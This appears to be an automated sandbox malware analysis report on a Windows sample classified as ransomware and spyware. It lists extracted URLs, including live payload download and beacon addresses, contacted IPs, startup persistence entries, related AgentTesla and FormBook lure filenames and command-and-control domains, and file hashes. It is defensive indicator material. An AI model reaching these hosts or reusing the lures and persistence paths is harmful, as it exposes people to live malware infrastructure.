                                                                                                          http://185.172.128.145/15f649199f40275b/sqlite3.dllsyncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 17%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://185.172.128InstallUtil.exe, 00000004.00000002.3412274842.00000000037C9000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          low
                                                                                                          https://net.geo.opera.comInstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://vovsoft.com/newsletter/JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364169110.0000000002240000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000002.3335089393.0000000002010000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364717240.0000000002004000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374459385.0000000003110000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374651648.00000000021BC000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384449389.0000000000699000.00000004.00000020.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384651313.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629728439.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3381759590.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629814594.0000000001FD4000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000002.3386461387.0000000002080000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675623782.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675733855.0000000002074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icosyncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.172.128.145/15f649199f40275b/sqlite3.dllCRsyncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://search.msn.com/msnbot.htm)msnbot/1.1N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                                                high
                                                                                                                https://yip.su/RNWPdInstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://185.172.128.187/ping.php?substr=seven93cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://vovsoft.com/contact/.JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364169110.0000000002240000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000002.3335089393.0000000002010000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364717240.0000000002004000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374459385.0000000003110000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374651648.00000000021BC000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384449389.0000000000699000.00000004.00000020.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384651313.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629728439.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3381759590.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629814594.0000000001FD4000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000002.3386461387.0000000002080000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675623782.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675733855.0000000002074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://195.16.74.230/2simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://legal.opera.com/eula/computers7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                                                                    high
                                                                                                                    https://crashstats-collector.opera.com/collector/submit--annotation=channel=Stable--annotation=plat=7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391349315.0000000050E14000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3370357777.00000000011F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000002.00000003.2025274092.000002191A333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
IP              | Domain  | Country            | ASN    | ASN Name                                        | Malicious
93.171.243.253  | unknown | Czech Republic     | 8870   | OVDC-ASUA                                       | false
38.127.172.200  | unknown | United States      | 174    | COGENT-174US                                    | false
212.110.188.202 | unknown | United Kingdom     | 35425  | BYTEMARK-ASGB                                   | false
24.230.33.96    | unknown | United States      | 11232  | MIDCO-NETUS                                     | false
64.157.16.43    | unknown | United States      | 3064   | AFFINITY-FTLUS                                  | false
183.165.245.47  | unknown | China              | 4134   | CHINANET-BACKBONENo31Jin-rongStreetCN           | false
182.160.100.156 | unknown | Bangladesh         | 24323  | AAMRA-NETWORKS-AS-APaamranetworkslimitedBD      | false
50.169.37.50    | unknown | United States      | 7922   | COMCAST-7922US                                  | false
103.216.51.36   | unknown | Cambodia           | 135375 | TCC-AS-APTodayCommunicationCoLtdKH              | false
119.2.42.135    | unknown | Indonesia          | 38524  | LAXONET-AS-IDLaxoGlobalAksesPTID                | false
51.15.139.15    | unknown | France             | 12876  | OnlineSASFR                                     | false
181.78.11.217   | unknown | Argentina          | 52468  | UFINETPANAMASAPA                                | false
194.44.177.225  | unknown | Ukraine            | 3255   | UARNET-ASUARNetUA                               | false
89.168.121.175  | unknown | United Kingdom     | 9105   | TISCALI-UKTalkTalkCommunicationsLimitedGB       | false
181.78.11.218   | unknown | Argentina          | 52468  | UFINETPANAMASAPA                                | false
85.237.62.189   | unknown | Russian Federation | 12389  | ROSTELECOM-ASRU                                 | false
41.155.190.214  | unknown | Egypt              | 37069  | MOBINILEG                                       | false
13.234.24.116   | unknown | United States      | 16509  | AMAZON-02US                                     | false
139.255.193.243 | unknown | Indonesia          | 9905   | LINKNET-ID-APLinknetASNID                       | false
159.65.0.189    | unknown | United States      | 14061  | DIGITALOCEAN-ASNUS                              | false
103.4.118.130   | unknown | Bangladesh         | 38203  | ADNTELECOMLTD-BDADNTelecomLtdBD                 | false
31.43.63.70     | unknown | Ukraine            | 50581  | UTGUA                                           | false
103.74.229.133  | unknown | Bangladesh         | 131340 | TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBD         | false
52.35.240.119   | unknown | United States      | 16509  | AMAZON-02US                                     | false
68.183.17.152   | unknown | United States      | 14061  | DIGITALOCEAN-ASNUS                              | false
119.15.89.87    | unknown | Cambodia           | 24492  | IIT-WICAM-AS-APWiCAMCorporationLtdKH            | false
103.25.210.102  | unknown | Indonesia          | 132653 | B-LINK-AS-IDPTTransdataSejahteraID              | false
221.194.149.8   | unknown | China              | 4837   | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN  | false
146.19.106.42   | unknown | France             | 7726   | FITC-ASUS                                       | false
46.17.63.166    | unknown | United Kingdom     | 39326  | HSO-GROUPGB                                     | false
114.129.2.82    | unknown | Japan              | 7671   | MCNETNTTSmartConnectCorporationJP               | false
62.171.131.101  | unknown | United Kingdom     | 51167  | CONTABODE                                       | false
216.74.255.182  | unknown | United States      | 11215  | LOGIXCOMM-ASUS                                  | false
103.79.96.218   | unknown | Indonesia          | 64308  | IDNIC-DATAON-AS-IDPTIndoDevNiagaInternetID      | false
103.47.93.250   | unknown | India              | 9830   | SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN          | false
14.161.17.4     | unknown | Viet Nam           | 45899  | VNPT-AS-VNVNPTCorpVN                            | false
183.164.254.8   | unknown | China              | 4134   | CHINANET-BACKBONENo31Jin-rongStreetCN           | false
103.47.93.252   | unknown | India              | 9830   | SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN          | false
194.9.80.1      | unknown | unknown            | 206495 | IR-SADRA-20180529IR                             | false
103.47.93.248   | unknown | India              | 9830   | SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN          | false
212.110.188.222 | unknown | United Kingdom     | 35425  | BYTEMARK-ASGB                                   | false
202.162.105.202 | unknown | Singapore          | 64050  | BCPL-SGBGPNETGlobalASNSG                        | false
                                                                                                                        67.205.177.122
                                                                                                                        unknownUnited States
                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                        46.36.70.104
                                                                                                                        unknownLithuania
                                                                                                                        43627KLI-ASLTfalse
                                                                                                                        212.110.188.220
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        146.19.106.59
                                                                                                                        unknownFrance
                                                                                                                        7726FITC-ASUSfalse
                                                                                                                        67.213.210.115
                                                                                                                        unknownUnited States
                                                                                                                        32780HOSTINGSERVICES-INCUSfalse
                                                                                                                        109.123.254.43
                                                                                                                        unknownCzech Republic
                                                                                                                        15685CASABLANCA-ASInternetCollocationProviderCZfalse
                                                                                                                        172.67.200.220
                                                                                                                        unknownUnited States
                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                        50.233.240.87
                                                                                                                        unknownUnited States
                                                                                                                        7922COMCAST-7922USfalse
                                                                                                                        67.213.210.118
                                                                                                                        unknownUnited States
                                                                                                                        32780HOSTINGSERVICES-INCUSfalse
                                                                                                                        38.242.199.111
                                                                                                                        unknownUnited States
                                                                                                                        36336NATIXISUSfalse
                                                                                                                        91.185.84.228
                                                                                                                        unknownRussian Federation
                                                                                                                        49816CMST-VOLGA-SIMBIRSKASRUfalse
                                                                                                                        74.103.66.15
                                                                                                                        unknownUnited States
                                                                                                                        701UUNETUSfalse
                                                                                                                        219.73.88.167
                                                                                                                        unknownHong Kong
                                                                                                                        4760HKTIMS-APHKTLimitedHKfalse
                                                                                                                        212.110.188.216
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        103.47.93.242
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        212.110.188.211
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        128.199.104.93
                                                                                                                        unknownUnited Kingdom
                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                        103.47.93.236
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        212.110.188.213
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        35.207.123.94
                                                                                                                        unknownUnited States
                                                                                                                        19527GOOGLE-2USfalse
                                                                                                                        183.215.23.242
                                                                                                                        unknownChina
                                                                                                                        56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                                                                                                        103.189.96.98
                                                                                                                        unknownunknown
                                                                                                                        7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                        162.144.32.209
                                                                                                                        unknownUnited States
                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                        148.72.23.56
                                                                                                                        unknownUnited States
                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                        47.116.126.120
                                                                                                                        unknownChina
                                                                                                                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                        81.250.223.126
                                                                                                                        unknownFrance
                                                                                                                        3215FranceTelecom-OrangeFRfalse
                                                                                                                        218.252.244.126
                                                                                                                        unknownHong Kong
                                                                                                                        9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                                                                                                        89.165.40.8
                                                                                                                        unknownIran (ISLAMIC Republic Of)
                                                                                                                        39501NGSASIRfalse
                                                                                                                        47.236.56.214
                                                                                                                        unknownUnited States
                                                                                                                        20115CHARTER-20115USfalse
                                                                                                                        103.47.93.233
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        191.101.1.116
                                                                                                                        unknownChile
                                                                                                                        61317ASDETUKhttpwwwheficedcomGBfalse
                                                                                                                        212.110.188.204
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        94.131.14.66
                                                                                                                        unknownUkraine
                                                                                                                        29632NASSIST-ASGIfalse
                                                                                                                        103.47.93.231
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        212.110.188.207
                                                                                                                        unknownUnited Kingdom
                                                                                                                        35425BYTEMARK-ASGBfalse
                                                                                                                        23.111.102.153
                                                                                                                        unknownRussian Federation
                                                                                                                        7979SERVERS-COMUSfalse
                                                                                                                        103.47.93.223
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        113.74.26.116
                                                                                                                        unknownChina
                                                                                                                        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                        113.74.26.114
                                                                                                                        unknownChina
                                                                                                                        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                        5.190.220.235
                                                                                                                        unknownIran (ISLAMIC Republic Of)
                                                                                                                        58224TCIIRfalse
                                                                                                                        104.17.9.114
                                                                                                                        unknownUnited States
                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                        177.10.193.82
                                                                                                                        unknownBrazil
                                                                                                                        262854AFINETSOLUCOESEMTECNOLOGIADAINFORMACAOLTDABRfalse
                                                                                                                        20.33.5.27
                                                                                                                        unknownUnited States
                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                        200.174.198.95
                                                                                                                        unknownBrazil
                                                                                                                        4230CLAROSABRfalse
                                                                                                                        194.87.206.12
                                                                                                                        unknownRussian Federation
                                                                                                                        197695AS-REGRUfalse
                                                                                                                        120.33.126.200
                                                                                                                        unknownChina
                                                                                                                        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                        45.71.15.136
                                                                                                                        unknownBrazil
                                                                                                                        267595MILANINNETBRfalse
                                                                                                                        103.47.93.214
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        103.47.93.213
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        180.104.0.161
                                                                                                                        unknownChina
                                                                                                                        137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                                                                                                                        104.236.0.129
                                                                                                                        unknownUnited States
                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                        103.47.93.219
                                                                                                                        unknownIndia
                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                        181.209.117.51
                                                                                                                        unknownArgentina
                                                                                                                        52361ARSAT-EmpresaArgentinadeSolucionesSatelitalesSAARfalse
                                                                                                                        54.67.125.45
                                                                                                                        unknownUnited States
                                                                                                                        16509AMAZON-02USfalse
                                                                                                                        14.232.235.13
                                                                                                                        unknownViet Nam
                                                                                                                        45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                                        185.236.203.208
                                                                                                                        unknownRomania
                                                                                                                        9009M247GBfalse
                                                                                                                        24.106.221.230
                                                                                                                        unknownUnited States
                                                                                                                        11426TWC-11426-CAROLINASUSfalse
                                                                                                                        41.65.162.73
                                                                                                                        unknownEgypt
                                                                                                                        36992ETISALAT-MISREGfalse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1407288
Start date and time: 2024-03-12 08:51:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 47
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@179/370@0/100
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 269
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Execution Graph export aborted for target InstallUtil.exe, PID 44140 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
Time | Type | Description
08:52:04 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:52:06 | API Interceptor | 81x Sleep call for process: file.exe modified
08:52:17 | API Interceptor | 460x Sleep call for process: InstallUtil.exe modified
08:52:20 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat
08:52:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat
08:52:43 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat
08:52:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cla0E40Je2hn0CYHGFvqKVqq.bat
08:53:08 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.bat
08:53:18 | API Interceptor | 18x Sleep call for process: simplewebbuilder.exe modified
08:53:40 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.bat
08:54:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7kYVA9yDGM0IXRQZ7eeFLFr.bat
08:54:18 | Task Scheduler | Run new task: Firefox Default Browser Agent 02A17326DCA6ADA2 path: C:\Users\user\AppData\Roaming\bvssbtt
08:54:21 | Task Scheduler | Run new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
08:54:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.bat
08:54:46 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lwdC9tGnJWFtRIKbwILKiy0H.bat
Match | Associated Sample Name / URL | Detection | Threat Name | Context
93.171.243.253 | DHL- Shipping invoice.exe | malicious | AgentTesla | artemis-rat.com:443
93.171.243.253 | DHL EXPRESS.exe | malicious | AgentTesla | artemis-rat.com:443
93.171.243.253 | New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | artemis-rat.com:443
38.127.172.200 | DHL- Shipping invoice.exe | malicious | AgentTesla |
212.110.188.202 | PO-065-01-2024E-2.exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com:443
212.110.188.202 | Payment Invoice.exe | malicious | AgentTesla | artemis-rat.com:443
212.110.188.202 | PAYMENT.exe | malicious | AgentTesla | artemis-rat.com:443
212.110.188.202 | PO23656PDFF.exe | malicious | AgentTesla | artemis-rat.com:443
212.110.188.202 | dl7WL77rkA.exe | malicious | Glupteba, Mars Stealer, Stealc, Vidar | artemis-rat.com:443
212.110.188.202 | DHL EXPRESS.exe | malicious | AgentTesla | artemis-rat.com:443
212.110.188.202 | Customer's Requirements and Pricing Details.exe | malicious | AgentTesla | artemis-rat.com:443
212.110.188.202 | HtfOQz42tN.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.com:443
212.110.188.202 | 3011574829.exe | malicious | Unknown | artemis-rat.com:443
212.110.188.202 | 75C8OqdJUQ.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.com:443
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BYTEMARK-ASGB | DHL- Shipping invoice.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | DHL EXPRESS.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | Kazeem Engineering and Technical Services.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | POs#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | PO-065-01-2024E-2.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | Payment Invoice.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | RFQ__ PO-7647454645_PDF.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | copia TT allegata.exe | malicious | AgentTesla | 212.110.188.207
BYTEMARK-ASGB | ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exe | malicious | FormBook | 212.110.188.207
OVDC-ASUA | DHL- Shipping invoice.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | DHL EXPRESS.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | Kazeem Engineering and Technical Services.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | POs#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | PO-065-01-2024E-2.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | Payment Invoice.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | DHL DETAILS.exe | malicious | AgentTesla | 93.171.243.253
OVDC-ASUA | https://waltondev2.com/c.php | malicious | Phisher | 93.171.243.253
OVDC-ASUA | SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe | malicious | AgentTesla | 93.171.243.253
MIDCO-NETUS | DHL- Shipping invoice.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | DHL EXPRESS.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | Kazeem Engineering and Technical Services.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | POs#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | PO-065-01-2024E-2.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | Payment Invoice.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | RFQ__ PO-7647454645_PDF.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | copia TT allegata.exe | malicious | AgentTesla | 24.230.33.96
MIDCO-NETUS | ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exe | malicious | FormBook | 24.230.33.96
COGENT-174US | X4hQbUq5Ib.elf | malicious | Mirai | 38.91.207.86
COGENT-174US | HH5LnBFw1p.elf | malicious | Mirai | 38.250.166.218
COGENT-174US | rehsc3y8Kc.elf | malicious | Mirai | 38.168.56.166
COGENT-174US | DHL- Shipping invoice.exe | malicious | AgentTesla | 38.127.172.200
COGENT-174US | cuenta para pago.exe | malicious | FormBook, GuLoader | 154.55.135.138
COGENT-174US | fvdsoH9LQneIhQP.exe | malicious | FormBook, PureLog Stealer | 154.41.240.199
COGENT-174US | https://apicachebot.com | malicious | Unknown | 154.29.75.236
COGENT-174US | KY9D34Qh8d.exe | malicious | Unknown | 38.12.219.48
COGENT-174US | https://rawhidetravel-my.sharepoint.com/:b:/p/flythis/EUZPkBb9KmVGmVk4U_ULjMwBMNZ8sgSp-pia4eYwz8Clog?e=S3j7o4 | malicious | HTMLPhisher | 154.62.109.71
COGENT-174US | Transferencia de pago.exe | malicious | FormBook, GuLoader | 154.55.135.138
No context
No context
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 51200
Entropy (8bit): 0.8746135976761988
Encrypted: false
SSDEEP: 96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5: 9E68EA772705B5EC0C83C2A97BB26324
SHA1: 243128040256A9112CEAC269D56AD6B21061FF80
SHA-256: 17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512: 312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 20480
